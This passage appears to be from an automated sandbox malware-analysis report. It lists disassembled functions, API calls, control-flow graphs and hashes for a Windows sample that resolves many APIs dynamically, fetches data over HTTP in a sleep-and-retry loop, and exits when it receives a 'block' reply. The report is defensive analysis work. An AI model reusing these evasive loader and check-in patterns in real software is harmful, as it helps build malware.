                            • Instruction Fuzzy Hash: 8CF04FB1944208ABCB04DF99DD4AFAEBBBCFB04715F10026AFA05A2680C77915048BA1
                            Function 00681160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitInfoProcessSystem
                            • String ID:
                            • API String ID: 752954902-0
                            • Opcode ID: d5fbe88888d172d4a4bb7c3888ddf4f9eecd6c369862836c195b7480d4f69ca5
                            • Instruction ID: 44cf5ee2f88dbaa916132db9e137101b0d4ad597031a064159f15f0a3dcaea39
                            • Opcode Fuzzy Hash: d5fbe88888d172d4a4bb7c3888ddf4f9eecd6c369862836c195b7480d4f69ca5
                            • Instruction Fuzzy Hash: F6D05E7490030CDBCB04EFE0DC8DADDBB78FB08315F000694D94562340EA305482CBA6
                            Function 00699C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 633 699c10-699c1a 634 699c20-69a031 GetProcAddress * 43 633->634 635 69a036-69a0ca LoadLibraryA * 8 633->635 634->635 636 69a0cc-69a141 GetProcAddress * 5 635->636 637 69a146-69a14d 635->637 636->637 638 69a153-69a211 GetProcAddress * 8 637->638 639 69a216-69a21d 637->639 638->639 640 69a298-69a29f 639->640 641 69a21f-69a293 GetProcAddress * 5 639->641 642 69a2a5-69a332 GetProcAddress * 6 640->642 643 69a337-69a33e 640->643 641->640 642->643 644 69a41f-69a426 643->644 645 69a344-69a41a GetProcAddress * 9 643->645 646 69a428-69a49d GetProcAddress * 5 644->646 647 69a4a2-69a4a9 644->647 645->644 646->647 648 69a4ab-69a4d7 GetProcAddress * 2 647->648 649 69a4dc-69a4e3 647->649 648->649 650 69a515-69a51c 649->650 651 69a4e5-69a510 GetProcAddress * 2 649->651 652 69a612-69a619 650->652 653 69a522-69a60d GetProcAddress * 10 650->653 651->650 654 69a61b-69a678 GetProcAddress * 4 652->654 655 69a67d-69a684 652->655 653->652 654->655 656 69a69e-69a6a5 655->656 657 69a686-69a699 GetProcAddress 655->657 658 69a708-69a709 656->658 659 69a6a7-69a703 GetProcAddress * 4 656->659 657->656 659->658
                            APIs
                            • GetProcAddress.KERNEL32(75900000,013968A0), ref: 00699C2D
                            • GetProcAddress.KERNEL32(75900000,013969A0), ref: 00699C45
                            • GetProcAddress.KERNEL32(75900000,013A8C40), ref: 00699C5E
                            • GetProcAddress.KERNEL32(75900000,013A8D48), ref: 00699C76
                            • GetProcAddress.KERNEL32(75900000,013ACAF0), ref: 00699C8E
                            • GetProcAddress.KERNEL32(75900000,013ACC40), ref: 00699CA7
                            • GetProcAddress.KERNEL32(75900000,0139B310), ref: 00699CBF
                            • GetProcAddress.KERNEL32(75900000,013ACD60), ref: 00699CD7
                            • GetProcAddress.KERNEL32(75900000,013ACC70), ref: 00699CF0
                            • GetProcAddress.KERNEL32(75900000,013ACCA0), ref: 00699D08
                            • GetProcAddress.KERNEL32(75900000,013ACBC8), ref: 00699D20
                            • GetProcAddress.KERNEL32(75900000,013966A0), ref: 00699D39
                            • GetProcAddress.KERNEL32(75900000,013968C0), ref: 00699D51
                            • GetProcAddress.KERNEL32(75900000,01396940), ref: 00699D69
                            • GetProcAddress.KERNEL32(75900000,013968E0), ref: 00699D82
                            • GetProcAddress.KERNEL32(75900000,013ACC88), ref: 00699D9A
                            • GetProcAddress.KERNEL32(75900000,013ACCE8), ref: 00699DB2
                            • GetProcAddress.KERNEL32(75900000,0139AF28), ref: 00699DCB
                            • GetProcAddress.KERNEL32(75900000,01396960), ref: 00699DE3
                            • GetProcAddress.KERNEL32(75900000,013ACDD8), ref: 00699DFB
                            • GetProcAddress.KERNEL32(75900000,013ACCB8), ref: 00699E14
                            • GetProcAddress.KERNEL32(75900000,013ACDC0), ref: 00699E2C
                            • GetProcAddress.KERNEL32(75900000,013ACCD0), ref: 00699E44
                            • GetProcAddress.KERNEL32(75900000,01396680), ref: 00699E5D
                            • GetProcAddress.KERNEL32(75900000,013ACD78), ref: 00699E75
                            • GetProcAddress.KERNEL32(75900000,013ACC58), ref: 00699E8D
                            • GetProcAddress.KERNEL32(75900000,013ACB08), ref: 00699EA6
                            • GetProcAddress.KERNEL32(75900000,013ACD90), ref: 00699EBE
                            • GetProcAddress.KERNEL32(75900000,013ACC28), ref: 00699ED6
                            • GetProcAddress.KERNEL32(75900000,013ACB80), ref: 00699EEF
                            • GetProcAddress.KERNEL32(75900000,013ACD00), ref: 00699F07
                            • GetProcAddress.KERNEL32(75900000,013ACB98), ref: 00699F1F
                            • GetProcAddress.KERNEL32(75900000,013ACB20), ref: 00699F38
                            • GetProcAddress.KERNEL32(75900000,013A9E58), ref: 00699F50
                            • GetProcAddress.KERNEL32(75900000,013ACB38), ref: 00699F68
                            • GetProcAddress.KERNEL32(75900000,013ACD18), ref: 00699F81
                            • GetProcAddress.KERNEL32(75900000,01396A00), ref: 00699F99
                            • GetProcAddress.KERNEL32(75900000,013ACB50), ref: 00699FB1
                            • GetProcAddress.KERNEL32(75900000,013966C0), ref: 00699FCA
                            • GetProcAddress.KERNEL32(75900000,013ACDA8), ref: 00699FE2
                            • GetProcAddress.KERNEL32(75900000,013ACD30), ref: 00699FFA
                            • GetProcAddress.KERNEL32(75900000,013962C0), ref: 0069A013
                            • GetProcAddress.KERNEL32(75900000,01396480), ref: 0069A02B
                            • LoadLibraryA.KERNEL32(013ACD48,?,00695CA3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE3), ref: 0069A03D
                            • LoadLibraryA.KERNEL32(013ACBF8,?,00695CA3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE3), ref: 0069A04E
                            • LoadLibraryA.KERNEL32(013ACB68,?,00695CA3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE3), ref: 0069A060
                            • LoadLibraryA.KERNEL32(013ACBB0,?,00695CA3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE3), ref: 0069A072
                            • LoadLibraryA.KERNEL32(013ACBE0,?,00695CA3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE3), ref: 0069A083
                            • LoadLibraryA.KERNEL32(013ACC10,?,00695CA3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE3), ref: 0069A095
                            • LoadLibraryA.KERNEL32(013ACE20,?,00695CA3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE3), ref: 0069A0A7
                            • LoadLibraryA.KERNEL32(013ACFA0,?,00695CA3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE3), ref: 0069A0B8
                            • GetProcAddress.KERNEL32(75FD0000,01396620), ref: 0069A0DA
                            • GetProcAddress.KERNEL32(75FD0000,013ACE50), ref: 0069A0F2
                            • GetProcAddress.KERNEL32(75FD0000,013A8B10), ref: 0069A10A
                            • GetProcAddress.KERNEL32(75FD0000,013ACE98), ref: 0069A123
                            • GetProcAddress.KERNEL32(75FD0000,013964C0), ref: 0069A13B
                            • GetProcAddress.KERNEL32(6FD30000,0139B108), ref: 0069A160
                            • GetProcAddress.KERNEL32(6FD30000,013963E0), ref: 0069A179
                            • GetProcAddress.KERNEL32(6FD30000,0139B130), ref: 0069A191
                            • GetProcAddress.KERNEL32(6FD30000,013ACDF0), ref: 0069A1A9
                            • GetProcAddress.KERNEL32(6FD30000,013ACE80), ref: 0069A1C2
                            • GetProcAddress.KERNEL32(6FD30000,01396660), ref: 0069A1DA
                            • GetProcAddress.KERNEL32(6FD30000,013963C0), ref: 0069A1F2
                            • GetProcAddress.KERNEL32(6FD30000,013ACE38), ref: 0069A20B
                            • GetProcAddress.KERNEL32(763B0000,01396400), ref: 0069A22C
                            • GetProcAddress.KERNEL32(763B0000,013963A0), ref: 0069A244
                            • GetProcAddress.KERNEL32(763B0000,013ACEB0), ref: 0069A25D
                            • GetProcAddress.KERNEL32(763B0000,013ACF28), ref: 0069A275
                            • GetProcAddress.KERNEL32(763B0000,01396460), ref: 0069A28D
                            • GetProcAddress.KERNEL32(750F0000,0139B180), ref: 0069A2B3
                            • GetProcAddress.KERNEL32(750F0000,0139B1A8), ref: 0069A2CB
                            • GetProcAddress.KERNEL32(750F0000,013ACE68), ref: 0069A2E3
                            • GetProcAddress.KERNEL32(750F0000,01396440), ref: 0069A2FC
                            • GetProcAddress.KERNEL32(750F0000,01396420), ref: 0069A314
                            • GetProcAddress.KERNEL32(750F0000,0139B1D0), ref: 0069A32C
                            • GetProcAddress.KERNEL32(75A50000,013ACF88), ref: 0069A352
                            • GetProcAddress.KERNEL32(75A50000,013964A0), ref: 0069A36A
                            • GetProcAddress.KERNEL32(75A50000,013A8A40), ref: 0069A382
                            • GetProcAddress.KERNEL32(75A50000,013ACEC8), ref: 0069A39B
                            • GetProcAddress.KERNEL32(75A50000,013ACEE0), ref: 0069A3B3
                            • GetProcAddress.KERNEL32(75A50000,013964E0), ref: 0069A3CB
                            • GetProcAddress.KERNEL32(75A50000,01396500), ref: 0069A3E4
                            • GetProcAddress.KERNEL32(75A50000,013ACEF8), ref: 0069A3FC
                            • GetProcAddress.KERNEL32(75A50000,013ACF40), ref: 0069A414
                            • GetProcAddress.KERNEL32(75070000,01396520), ref: 0069A436
                            • GetProcAddress.KERNEL32(75070000,013ACF10), ref: 0069A44E
                            • GetProcAddress.KERNEL32(75070000,013ACF58), ref: 0069A466
                            • GetProcAddress.KERNEL32(75070000,013ACF70), ref: 0069A47F
                            • GetProcAddress.KERNEL32(75070000,013ACE08), ref: 0069A497
                            • GetProcAddress.KERNEL32(74E50000,01396540), ref: 0069A4B8
                            • GetProcAddress.KERNEL32(74E50000,01396380), ref: 0069A4D1
                            • GetProcAddress.KERNEL32(75320000,01396280), ref: 0069A4F2
                            • GetProcAddress.KERNEL32(75320000,013AC7F0), ref: 0069A50A
                            • GetProcAddress.KERNEL32(6F060000,01396560), ref: 0069A530
                            • GetProcAddress.KERNEL32(6F060000,01396580), ref: 0069A548
                            • GetProcAddress.KERNEL32(6F060000,013965A0), ref: 0069A560
                            • GetProcAddress.KERNEL32(6F060000,013ACA48), ref: 0069A579
                            • GetProcAddress.KERNEL32(6F060000,013965C0), ref: 0069A591
                            • GetProcAddress.KERNEL32(6F060000,013965E0), ref: 0069A5A9
                            • GetProcAddress.KERNEL32(6F060000,01396600), ref: 0069A5C2
                            • GetProcAddress.KERNEL32(6F060000,01396640), ref: 0069A5DA
                            • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0069A5F1
                            • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0069A607
                            • GetProcAddress.KERNEL32(74E00000,013AC9A0), ref: 0069A629
                            • GetProcAddress.KERNEL32(74E00000,013A8B60), ref: 0069A641
                            • GetProcAddress.KERNEL32(74E00000,013AC9D0), ref: 0069A659
                            • GetProcAddress.KERNEL32(74E00000,013AC988), ref: 0069A672
                            • GetProcAddress.KERNEL32(74DF0000,01396300), ref: 0069A693
                            • GetProcAddress.KERNEL32(6E350000,013AC9B8), ref: 0069A6B4
                            • GetProcAddress.KERNEL32(6E350000,013962A0), ref: 0069A6CD
                            • GetProcAddress.KERNEL32(6E350000,013AC880), ref: 0069A6E5
                            • GetProcAddress.KERNEL32(6E350000,013AC928), ref: 0069A6FD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: HttpQueryInfoA$InternetSetOptionA
                            • API String ID: 2238633743-1775429166
                            • Opcode ID: d4b34e84065022e7ffa2a3ed557908043b71c11ae208208598f063d6f271b6de
                            • Instruction ID: a6a0f6526888c5f7463c6b466279a0297e02667b5c983ce207251dad48f08205
                            • Opcode Fuzzy Hash: d4b34e84065022e7ffa2a3ed557908043b71c11ae208208598f063d6f271b6de
                            • Instruction Fuzzy Hash: AC624CB550020CAFC34CDFA8FD88D663BF9F78C709B14852AA649C3224D739A851DF56
                            Function 00686280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1033 686280-68630b call 69a7a0 call 6847b0 call 69a740 InternetOpenA StrCmpCA 1040 68630d 1033->1040 1041 686314-686318 1033->1041 1040->1041 1042 686509-686525 call 69a7a0 call 69a800 * 2 1041->1042 1043 68631e-686342 InternetConnectA 1041->1043 1062 686528-68652d 1042->1062 1045 686348-68634c 1043->1045 1046 6864ff-686503 InternetCloseHandle 1043->1046 1048 68635a 1045->1048 1049 68634e-686358 1045->1049 1046->1042 1051 686364-686392 HttpOpenRequestA 1048->1051 1049->1051 1053 686398-68639c 1051->1053 1054 6864f5-6864f9 InternetCloseHandle 1051->1054 1056 68639e-6863bf InternetSetOptionA 1053->1056 1057 6863c5-686405 HttpSendRequestA HttpQueryInfoA 1053->1057 1054->1046 1056->1057 1058 68642c-68644b call 698940 1057->1058 1059 686407-686427 call 69a740 call 69a800 * 2 1057->1059 1067 6864c9-6864e9 call 69a740 call 69a800 * 2 1058->1067 1068 68644d-686454 1058->1068 1059->1062 1067->1062 1071 686456-686480 InternetReadFile 1068->1071 1072 6864c7-6864ef InternetCloseHandle 1068->1072 1076 68648b 1071->1076 1077 686482-686489 1071->1077 1072->1054 1076->1072 1077->1076 1080 68648d-6864c5 call 69a9b0 call 69a8a0 call 69a800 1077->1080 1080->1071
                            APIs
                              • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                              • Part of subcall function 006847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00684839
                              • Part of subcall function 006847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00684849
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                            • InternetOpenA.WININET(006A0DFE,00000001,00000000,00000000,00000000), ref: 006862E1
                            • StrCmpCA.SHLWAPI(?,013AE3F0), ref: 00686303
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00686335
                            • HttpOpenRequestA.WININET(00000000,GET,?,013ADE28,00000000,00000000,00400100,00000000), ref: 00686385
                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006863BF
                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006863D1
                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 006863FD
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0068646D
                            • InternetCloseHandle.WININET(00000000), ref: 006864EF
                            • InternetCloseHandle.WININET(00000000), ref: 006864F9
                            • InternetCloseHandle.WININET(00000000), ref: 00686503
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                            • String ID: ERROR$ERROR$GET
                            • API String ID: 3749127164-2509457195
                            • Opcode ID: c98ed0f7d7054063e2628425d161114b4c2248fce51ccc2486a9c459bc7dfd50
                            • Instruction ID: 47a761aee08d2206fdea0ae03e249894aeded9a15a3b784e257accfab250e3f5
                            • Opcode Fuzzy Hash: c98ed0f7d7054063e2628425d161114b4c2248fce51ccc2486a9c459bc7dfd50
                            • Instruction Fuzzy Hash: 6F713071A00218ABDF14EBE0DC49FEE77BAFB44704F108158F50A6B590DBB46A85CF91
                            Function 00695510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1090 695510-695577 call 695ad0 call 69a820 * 3 call 69a740 * 4 1106 69557c-695583 1090->1106 1107 695585-6955b6 call 69a820 call 69a7a0 call 681590 call 6951f0 1106->1107 1108 6955d7-69564c call 69a740 * 2 call 681590 call 6952c0 call 69a8a0 call 69a800 call 69aad0 StrCmpCA 1106->1108 1124 6955bb-6955d2 call 69a8a0 call 69a800 1107->1124 1134 695693-6956a9 call 69aad0 StrCmpCA 1108->1134 1138 69564e-69568e call 69a7a0 call 681590 call 6951f0 call 69a8a0 call 69a800 1108->1138 1124->1134 1139 6957dc-695844 call 69a8a0 call 69a820 * 2 call 681670 call 69a800 * 4 call 696560 call 681550 1134->1139 1140 6956af-6956b6 1134->1140 1138->1134 1269 695ac3-695ac6 1139->1269 1142 6957da-69585f call 69aad0 StrCmpCA 1140->1142 1143 6956bc-6956c3 1140->1143 1162 695991-6959f9 call 69a8a0 call 69a820 * 2 call 681670 call 69a800 * 4 call 696560 call 681550 1142->1162 1163 695865-69586c 1142->1163 1147 69571e-695793 call 69a740 * 2 call 681590 call 6952c0 call 69a8a0 call 69a800 call 69aad0 StrCmpCA 1143->1147 1148 6956c5-695719 call 69a820 call 69a7a0 call 681590 call 6951f0 call 69a8a0 call 69a800 1143->1148 1147->1142 1246 695795-6957d5 call 69a7a0 call 681590 call 6951f0 call 69a8a0 call 69a800 1147->1246 1148->1142 1162->1269 1169 69598f-695a14 call 69aad0 StrCmpCA 1163->1169 1170 695872-695879 1163->1170 1198 695a28-695a91 call 69a8a0 call 69a820 * 2 call 681670 call 69a800 * 4 call 696560 call 681550 1169->1198 1199 695a16-695a21 Sleep 1169->1199 1177 69587b-6958ce call 69a820 call 69a7a0 call 681590 call 6951f0 call 69a8a0 call 69a800 1170->1177 1178 6958d3-695948 call 69a740 * 2 call 681590 call 6952c0 call 69a8a0 call 69a800 call 69aad0 StrCmpCA 1170->1178 1177->1169 1178->1169 1275 69594a-69598a call 69a7a0 call 681590 call 6951f0 call 69a8a0 call 69a800 1178->1275 1198->1269 1199->1106 1246->1142 1275->1169
                            APIs
                              • Part of subcall function 0069A820: lstrlen.KERNEL32(00684F05,?,?,00684F05,006A0DDE), ref: 0069A82B
                              • Part of subcall function 0069A820: lstrcpy.KERNEL32(006A0DDE,00000000), ref: 0069A885
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00695644
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006956A1
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00695857
                              • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                              • Part of subcall function 006951F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00695228
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • Part of subcall function 006952C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00695318
                              • Part of subcall function 006952C0: lstrlen.KERNEL32(00000000), ref: 0069532F
                              • Part of subcall function 006952C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00695364
                              • Part of subcall function 006952C0: lstrlen.KERNEL32(00000000), ref: 00695383
                              • Part of subcall function 006952C0: lstrlen.KERNEL32(00000000), ref: 006953AE
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0069578B
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00695940
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00695A0C
                            • Sleep.KERNEL32(0000EA60), ref: 00695A1B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen$Sleep
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 507064821-2791005934
                            • Opcode ID: 8e11155d94b10eabb3d44939b2d00956f17c7eadaddf05eb5f87ba749bed25df
                            • Instruction ID: cfc8ece2cffd31d26b3e5dbe0e4796384bbf37e3e962b825b63d9111d0cb924e
                            • Opcode Fuzzy Hash: 8e11155d94b10eabb3d44939b2d00956f17c7eadaddf05eb5f87ba749bed25df
                            • Instruction Fuzzy Hash: D1E12E719101089ACF58FBE0DD56EED73BEAB54300F50812CB50766991EF346A0ACBDA
                            Function 006917A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1301 6917a0-6917cd call 69aad0 StrCmpCA 1304 6917cf-6917d1 ExitProcess 1301->1304 1305 6917d7-6917f1 call 69aad0 1301->1305 1309 6917f4-6917f8 1305->1309 1310 6917fe-691811 1309->1310 1311 6919c2-6919cd call 69a800 1309->1311 1313 69199e-6919bd 1310->1313 1314 691817-69181a 1310->1314 1313->1309 1315 691849-691858 call 69a820 1314->1315 1316 6918ad-6918be StrCmpCA 1314->1316 1317 6918cf-6918e0 StrCmpCA 1314->1317 1318 69198f-691999 call 69a820 1314->1318 1319 691821-691830 call 69a820 1314->1319 1320 69185d-69186e StrCmpCA 1314->1320 1321 69187f-691890 StrCmpCA 1314->1321 1322 6918f1-691902 StrCmpCA 1314->1322 1323 691951-691962 StrCmpCA 1314->1323 1324 691970-691981 StrCmpCA 1314->1324 1325 691913-691924 StrCmpCA 1314->1325 1326 691932-691943 StrCmpCA 1314->1326 1327 691835-691844 call 69a820 1314->1327 1315->1313 1342 6918ca 1316->1342 1343 6918c0-6918c3 1316->1343 1344 6918ec 1317->1344 1345 6918e2-6918e5 1317->1345 1318->1313 1319->1313 1338 69187a 1320->1338 1339 691870-691873 1320->1339 1340 69189e-6918a1 1321->1340 1341 691892-69189c 1321->1341 1346 69190e 1322->1346 1347 691904-691907 1322->1347 1329 69196e 1323->1329 1330 691964-691967 1323->1330 1332 69198d 1324->1332 1333 691983-691986 1324->1333 1348 691930 1325->1348 1349 691926-691929 1325->1349 1350 69194f 1326->1350 1351 691945-691948 1326->1351 1327->1313 1329->1313 1330->1329 1332->1313 1333->1332 1338->1313 1339->1338 1355 6918a8 1340->1355 1341->1355 1342->1313 1343->1342 1344->1313 1345->1344 1346->1313 1347->1346 1348->1313 1349->1348 1350->1313 1351->1350 1355->1313
                            APIs
                            • StrCmpCA.SHLWAPI(00000000,block), ref: 006917C5
                            • ExitProcess.KERNEL32 ref: 006917D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
